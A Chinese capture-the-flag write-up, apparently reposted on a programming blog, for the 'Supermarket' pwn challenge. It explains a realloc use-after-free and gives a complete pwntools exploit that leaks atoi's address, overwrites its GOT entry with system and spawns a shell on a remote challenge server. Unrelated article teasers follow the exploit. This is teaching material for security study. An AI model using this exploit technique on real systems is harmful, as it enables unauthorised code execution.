攻防世界PWN之Supermarket题解

2023-11-07 00:10

本文主要是介绍攻防世界PWN之Supermarket题解,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Supermarket

首先,看一下程序的保护机制。看起来还不错

然后,我们用IDA分析一下

分析出程序大概有这样的一个结构体

  1. typedef struct Node {  
  2.     char name[16];  
  3.     int price;  
  4.     int description_size;  
  5.     char *description;  
  6. } Node;  

 

用来输入的函数

最多只能输入n-1个字符,因此,也不能溢出

删除功能,也对Node指针设置了NULL

 

一切的检查的比较充分,然而,这里出现的漏洞

让我们先看看realloc的知识

 

根据百度百科

realloc原型是extern void *realloc(void *mem_address, unsigned int newsize);

先判断当前的指针是否有足够的连续空间,如果有,扩大mem_address指向的地址,并且将mem_address返回,如果空间不够,先按照newsize指定的大小分配空间,将原有数据从头到尾拷贝到新分配的内存区域,而后释放原来mem_address所指内存区域(注意:原来指针是自动释放,不需要使用free),同时返回新分配的内存区域的首地址。即重新分配存储器块的地址。

 

本程序中,realloc后,并没有把返回值重新赋值给node0->description,因此,当reallocnewsize大于原来的size时,原来区域的空间会被free,由于没有把返回地址赋给node0->description,因此存在UAF漏洞。

并且,由于创建node时,是先malloc node结构体,然后再malloc description的空间,所以,当我们再次申请创建一个node时,如果满足条件,node结构体就会申请到node0->description,然后,我们编辑node0description就是编辑node1的结构体,我们把node1description指向atoigot表,我们就可以实现泄露atoi的地址以及修改atoiGOT表。

 

注意,我们的node0description的大小必须为unsorted bin,因为,这样我们才能让node2的结构体申请到node0->description处,因为结构体空间大小为0x1C,刚好满足小于node0->description地址处空间的大小,可以从中切割区域。如果要使用fastbin的话,是不可行的,因为fastbin是当要申请的空间大小和空闲的空间大小一模一样时,才能分配到那个空闲的块处,假如我们设置的大小为0x1C,但是本题的用来获取输入的函数最多只能输入n-1个字符,最后一个字符会强制设置为0而我们要把atoigot表地址覆盖到node2->description,由于该字段位于结构体最后,因此,我们将会覆盖不完整。所以,我们使用unsorted bin。(请仔细思考一下)

 

当我们成功修改了node2的结构体时,我们就成功了八成了。只要我们把node2-> description指向atoi的got表,那么我们编辑node2的description时就是在编辑atoi的got表

综上,我们最终的exp脚本如下

  1. #coding:utf8  
  2. from pwn import *  
  3. from LibcSearcher import *  
  4.   
  5. #sh = process('./supermarket')  
  6. sh = remote('111.198.29.45',55879)  
  7. elf = ELF('./supermarket')  
  8. atoi_got = elf.got['atoi']  
  9.   
  10. def create(index,size,content):  
  11.    sh.sendlineafter('your choice>>','1')  
  12.    sh.sendlineafter('name:',str(index))  
  13.    sh.sendlineafter('price:','10')  
  14.    sh.sendlineafter('descrip_size:',str(size))  
  15.    sh.sendlineafter('description:',content)  
  16.   
  17. def delete(index):  
  18.    sh.sendlineafter('your choice>>','2')  
  19.    sh.sendlineafter('name:',str(index))  
  20.   
  21. def show():  
  22.    sh.sendlineafter('your choice>>','3')  
  23.   
  24. def edit(index,size,content):  
  25.    sh.sendlineafter('your choice>>','5')  
  26.    sh.sendlineafter('name:',str(index))  
  27.    sh.sendlineafter('descrip_size:',str(size))  
  28.    sh.sendlineafter('description:',content)  
  29.   
  30. #node0  
  31. create(0,0x80,'a'*0x10)  
  32. #node1,只用来做分隔作用,防止块合并  
  33. create(1,0x20,'b'*0x10)  
  34. #realloc node0->description  
  35. #注意不要加任何数据,因为我们发送的数据写入到的是一个被free的块(仔细思考一下这句话),这会导致后面malloc时出错  
  36. edit(0,0x90,'')  
  37. #现在node2将被分配到node0的原description  
  38. create(2,0x20,'d'*0x10)  
  39. payload = '2'.ljust(16,'\x00') + p32(20) + p32(0x20) + p32(atoi_got)  
  40. #由于没有把realloc返回的指针赋值给node0->description,因此node0->description还是原来那个地址处,现在存的是node1  
  41. #因此edit(0)就是编辑node1的结构体,我们通过修改,把node1->description指向atoigot  
  42. edit(0,0x80,payload)  
  43. #泄露信息  
  44. show()  
  45. sh.recvuntil('2: price.20, des.')  
  46. #泄露atoi的加载地址  
  47. atoi_addr = u32(sh.recvuntil('\n').split('\n')[0].ljust(4,'\x00'))  
  48.   
  49. libc = LibcSearcher('atoi',atoi_addr)  
  50. libc_base = atoi_addr - libc.dump('atoi')  
  51. system_addr = libc_base + libc.dump('system')  
  52. #修改atoi的表,将它指向system  
  53. edit(2,0x20,p32(system_addr))  
  54. #getshell  
  55. sh.sendlineafter('your choice>>','/bin/sh')  
  56.   
  57. sh.interactive()  

这篇关于攻防世界PWN之Supermarket题解的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/359912

相关文章

揭秘世界上那些同时横跨两大洲的国家

我们在《世界人口过亿的一级行政区分布》盘点全球是那些人口过亿的一级行政区。 现在我们介绍五个横跨两州的国家,并整理七大洲和这些国家的KML矢量数据分析分享给大家,如果你需要这些数据,请在文末查看领取方式。 世界上横跨两大洲的国家 地球被分为七个大洲分别是亚洲、欧洲、北美洲、南美洲、非洲、大洋洲和南极洲。 七大洲示意图 其中,南极洲是无人居住的大陆,而其他六个大洲则孕育了众多国家和

C++ | Leetcode C++题解之第393题UTF-8编码验证

题目: 题解: class Solution {public:static const int MASK1 = 1 << 7;static const int MASK2 = (1 << 7) + (1 << 6);bool isValid(int num) {return (num & MASK2) == MASK1;}int getBytes(int num) {if ((num &

C语言 | Leetcode C语言题解之第393题UTF-8编码验证

题目: 题解: static const int MASK1 = 1 << 7;static const int MASK2 = (1 << 7) + (1 << 6);bool isValid(int num) {return (num & MASK2) == MASK1;}int getBytes(int num) {if ((num & MASK1) == 0) {return

C - Word Ladder题解

C - Word Ladder 题解 解题思路: 先输入两个字符串S 和t 然后在S和T中寻找有多少个字符不同的个数(也就是需要变换多少次) 开始替换时: tips: 字符串下标以0开始 我们定义两个变量a和b,用于记录当前遍历到的字符 首先是判断:如果这时a已经==b了,那么就跳过,不用管; 如果a大于b的话:那么我们就让s中的第i项替换成b,接着就直接输出S就行了。 这样

【秋招笔试】9.07米哈游秋招改编题-三语言题解

🍭 大家好这里是 春秋招笔试突围,一起备战大厂笔试 💻 ACM金牌团队🏅️ | 多次AK大厂笔试 | 大厂实习经历 ✨ 本系列打算持续跟新 春秋招笔试题 👏 感谢大家的订阅➕ 和 喜欢💗 和 手里的小花花🌸 ✨ 笔试合集传送们 -> 🧷春秋招笔试合集 🍒 本专栏已收集 100+ 套笔试题,笔试真题 会在第一时间跟新 🍄 题面描述等均已改编,如果和你笔试题看到的题面描述

LeetCode 第414场周赛个人题解

目录 Q1. 将日期转换为二进制表示 原题链接 思路分析 AC代码 Q2. 范围内整数的最大得分 原题链接 思路分析 AC代码 Q3. 到达数组末尾的最大得分 原题链接 思路分析 AC代码 Q4. 吃掉所有兵需要的最多移动次数 原题链接 思路分析 AC代码 Q1. 将日期转换为二进制表示 原题链接 Q1. 将日期转换为二进制表示 思路分析

简单的Q-learning|小明的一维世界(3)

简单的Q-learning|小明的一维世界(1) 简单的Q-learning|小明的一维世界(2) 一维的加速度世界 这个世界,小明只能控制自己的加速度,并且只能对加速度进行如下三种操作:增加1、减少1、或者不变。所以行动空间为: { u 1 = − 1 , u 2 = 0 , u 3 = 1 } \{u_1=-1, u_2=0, u_3=1\} {u1​=−1,u2​=0,u3​=1}

简单的Q-learning|小明的一维世界(2)

上篇介绍了小明的一维世界模型 、Q-learning的状态空间、行动空间、奖励函数、Q-table、Q table更新公式、以及从Q值导出策略的公式等。最后给出最简单的一维位置世界的Q-learning例子,从给出其状态空间、行动空间、以及稠密与稀疏两种奖励函数的设置方式。下面将继续深入,GO! 一维的速度世界 这个世界,小明只能控制自己的速度,并且只能对速度进行如下三种操作:增加1、减

牛客小白月赛100部分题解

比赛地址:牛客小白月赛100_ACM/NOI/CSP/CCPC/ICPC算法编程高难度练习赛_牛客竞赛OJ A.ACM中的A题 #include<bits/stdc++.h>using namespace std;#define ll long long#define ull = unsigned long longvoid solve() {ll a,b,c;cin>>a>>b>

【Linux】萌新看过来!一篇文章带你走进Linux世界

🚀个人主页:奋斗的小羊 🚀所属专栏:Linux 很荣幸您能阅读我的文章,诚请评论指点,欢迎欢迎 ~ 目录 前言💥1、初识Linux💥1.1 什么是操作系统?💥1.2 各种操作系统对比💥1.3 现代Linux应用💥1.4 Linux常用版本 💥2、Linux 和 Windows 目录结构对比💥2.1 文件系统组织方式💥2.2